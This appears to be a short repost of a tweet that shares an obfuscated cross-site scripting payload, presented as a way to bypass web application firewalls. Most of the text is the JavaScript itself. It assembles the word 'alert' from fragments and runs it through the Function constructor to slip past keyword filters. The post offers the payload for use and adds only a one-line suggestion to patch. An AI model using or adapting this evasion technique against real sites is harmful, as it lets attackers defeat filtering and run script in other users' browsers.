A tweet has been shared containing an XSS payload for bypassing WAF. The payload is:
“`javascript
alert(origin);
W=!![];H=(W+"<code>")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)()
“`
This payload can be used for bypassing various WAFs. It uses a combination of characters and functions to execute the alert function. It is advised to patch any vulnerabilities that this payload may exploit.
Original tweet: https://twitter.com/neotrony/status/1846029553208025576